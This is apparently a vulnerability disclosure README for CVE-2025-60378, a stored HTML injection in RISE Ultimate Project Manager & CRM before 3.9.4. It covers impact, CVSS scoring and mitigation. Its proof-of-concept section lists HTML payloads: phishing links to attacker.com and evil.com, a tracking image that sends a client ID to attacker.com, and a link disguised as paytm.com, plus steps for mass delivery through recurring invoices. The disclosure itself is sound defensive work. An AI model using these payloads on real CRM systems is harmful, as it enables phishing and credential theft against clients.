CVE-2025-60378 PoC — RISE Ultimate Project Manager & CRM 安全漏洞

来源

关联漏洞

Description

CVE-2025-60378 — Stored HTML Injection in RISE — Ultimate Project Manager & CRM < 3.9.4 (Invoices & Messaging)

介绍

# CVE-2025-60378: Stored HTML Injection in RISE Ultimate Project Manager & CRM

> **⚠️ Security Advisory**  
> A critical Stored HTML Injection vulnerability affecting invoices, messaging, and automated communications

[![CVE](https://img.shields.io/badge/CVE-2025--60378-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60378)
[![Severity](https://img.shields.io/badge/Severity-High-orange)]()
[![CVSS](https://img.shields.io/badge/CVSS-8.1%20(High)-ff6600)]()
[![Product](https://img.shields.io/badge/Product-RISE%20CRM-blue)]()

---

## 📋 Overview

A critical Stored HTML Injection vulnerability has been discovered in RISE Ultimate Project Manager & CRM that allows authenticated users to inject malicious HTML into invoice line items, client notes, and messaging modules. This injected content persists in the database and is automatically rendered in client-facing emails, PDFs, and chat communications, enabling large-scale phishing attacks, business email compromise, and email/PDF-based malware delivery.

## 🎯 Affected Versions

- **Product:** RISE - Ultimate Project Manager & CRM
- **Vulnerable Versions:** < 3.9.4
- **Fixed Version:** 3.9.4+

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-60378 |
| **Type** | Stored HTML Injection |
| **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
| **Attack Vector** | Network/Remote |
| **Authentication** | Required (Low Privilege) |
| **User Interaction** | None |
| **Severity** | HIGH |
| **CVSS v3.1** | 8.1 - High |
| **Discoverer** | Ajansha Shankar |

### Description

RISE CRM fails to properly sanitize and encode HTML content in multiple user-editable fields including invoices, messages, and client notes. When authenticated users inject HTML payloads into these fields, the content is stored in the database without adequate filtering. Subsequently, this malicious HTML is automatically rendered in client-facing emails, PDF attachments, and messaging/chat modules without proper escaping. Recurring invoices and automated messaging amplify the attack by distributing malicious content to multiple recipients simultaneously.

### Affected Components

- ✗ Invoice line items (description field)
- ✗ Client note/messaging module
- ✗ Chat and messaging system
- ✗ Client statement generation module
- ✗ Automated email system (recurring invoices, reminders)
- ✗ PDF attachments

### Root Cause

- ❌ Insufficient input sanitization on invoice, message, and client note fields
- ❌ Missing HTML output encoding in email templates and PDF generation
- ❌ No content validation before storing in database
- ❌ Lack of restrictions on HTML/JavaScript in client communications
- ❌ Automated systems distribute unvalidated content without additional filtering

## 💥 Impact

### Security Implications

- **🎣 Large-Scale Phishing:** Injected content can impersonate legitimate communications and redirect multiple clients to attacker-controlled sites
- **💼 Business Email Compromise:** Malicious invoices and messages sent to clients appear to come from trusted source
- **💬 Compromised Messaging:** Malicious payloads in chat/messaging reach team members and clients directly
- **🦠 Malware Distribution:** Embedded malicious links or iframes deliver malware via email/PDF/messaging
- **🔄 Automated Attack Distribution:** Recurring invoices and automated messages ensure payload reaches multiple recipients without manual intervention
- **👥 Multi-Vector Attack:** Combined email, PDF, and messaging attack surfaces increase successful compromise rate

### CIA Triad Assessment

| Factor | Impact | Explanation |
|--------|--------|-------------|
| **Confidentiality** | 🔴 HIGH | Client credentials and sensitive data can be harvested via phishing |
| **Integrity** | 🔴 HIGH | Malicious content can modify perception of communications and business relationships |
| **Availability** | 🟡 LOW | Limited direct impact on system availability |

### Real-World Attack Scenarios

#### Scenario 1: Invoice-Based Phishing Campaign
An attacker with low-privilege project manager access creates an invoice with malicious HTML:
```html
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
```
The invoice is sent to 100+ clients via automated email. All clients receive what appears to be a legitimate invoice directing them to a phishing site. The attacker harvests credentials from multiple victims simultaneously.

#### Scenario 2: Messaging-Based Attack
An attacker injects malicious HTML into a client message:
```html
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
```
All team members and clients receive the message in their chat, clicking links to download malware.

#### Scenario 3: Recurring Invoice Malware Delivery
An attacker sets up a recurring invoice with malware delivery payload. Every month, clients automatically receive invoices with embedded malicious content, providing persistent attack vector.

## 🧪 Proof of Concept

### Environment Setup
- Access to RISE CRM admin panel with invoice/message creation permissions
- Any version prior to 3.9.4

### PoC Steps

#### Step 1: Access Invoice or Message Creation
```
Navigate to: RISE CRM Dashboard → Invoices/Messages → Create New
```

#### Step 2: Inject HTML Payload in Description/Message Field
```html
<a href="https://attacker.com">Click here to view invoice</a>
```

#### Step 3: Add Malicious Image with Redirect
```html
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
```

#### Step 4: Add Misleading Styling Payload
```html
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
```

#### Step 5: Configure Recurring Distribution
- Save the record
- Enable "Recurring" option (if available for invoices/messages)
- Set frequency (weekly, monthly, etc.)
- System automatically sends to all relevant clients

#### Step 6: Verify Attack Vector
- Check client email inbox
- Check client messaging/chat
- Open PDF attachment
- Observe malicious HTML rendered in all channels

### Expected Result
✅ Injected HTML renders in emails, PDFs, and messaging without escaping
✅ Links are clickable and redirect to attacker sites
✅ Images load from attacker-controlled servers
✅ Content persists across all future client communications
✅ Recurring distribution reaches multiple recipients automatically

## 🛡️ Mitigation

### For End Users

1. **✅ Upgrade Immediately:** Update to RISE CRM v3.9.4 or later
2. **🔍 Audit All Records:** Review recent invoices, messages, and client notes for suspicious HTML content
3. **⚠️ Client Notification:** Alert all clients if suspicious invoices or messages were sent
4. **🔄 Credential Reset:** Recommend clients change passwords if they clicked links
5. **📝 Monitor Activity:** Check audit logs for unauthorized invoice/message modifications
6. **🔐 Disable Recurring:** Temporarily disable recurring invoices/messages until patched


## 📚 References

- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP: Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/)
- [OWASP: HTML Injection](https://owasp.org/www-community/attacks/HTML_Injection)
- [OWASP: Output Encoding](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding)
- [CVE-2025-60378 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60378)

## 📅 Timeline

| Date | Event |
|------|-------|
| TBD | Vulnerability discovered |
| TBD | Vendor notified |
| TBD | CVE-2025-60378 assigned |
| TBD | Patch released (v3.9.4) |
| TBD | Public disclosure |

## 👤 Credits

**Discovered by:** Ajansha Shankar

**LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/

## 📊 CVSS v3.1 Assessment

**Vector:** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N`

**Score:** 8.1 (HIGH)

**Breakdown:**
- **Attack Vector (AV:N):** Network - Can be exploited remotely
- **Attack Complexity (AC:L):** Low - No special conditions required
- **Privileges Required (PR:L):** Low - Requires authenticated user with basic project manager privileges
- **User Interaction (UI:N):** None - No user interaction needed; automated systems distribute payload
- **Scope (S:U):** Unchanged - Impact is limited to the vulnerable component
- **Confidentiality (C:H):** High - Potential credential theft via phishing to multiple clients
- **Integrity (I:H):** High - Malicious content can be injected and delivered to multiple recipients
- **Availability (A:N):** None - No impact on system availability

## 📧 Contact

For questions or additional information:
- **LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/

---

**⭐ If this research was helpful, please consider starring this repository!**

**🔔 Stay updated:** Watch this repository for updates on this and future security research.


- [CVE-2025-60374](https://github.com/ajanshashankar/CVE-2025-60374) - Stored XSS in Perfex CRM Chatbot
- [CVE-2025-55903](https://github.com/ajanshashankar/CVE-2025-55903) - Stored HTML Injection in Perfex CRM Invoices
- [CVE-2025-60375](https://github.com/ajanshashankar/CVE-2025-60375) - Authentication Bypass in Perfex CRM

文件快照

 [4.0K]  /data/pocs/8a92b65bc319caddf69ba76abe9a0f4daf71ec56
└── [9.4K]  README.md

1 directory, 1 file

备注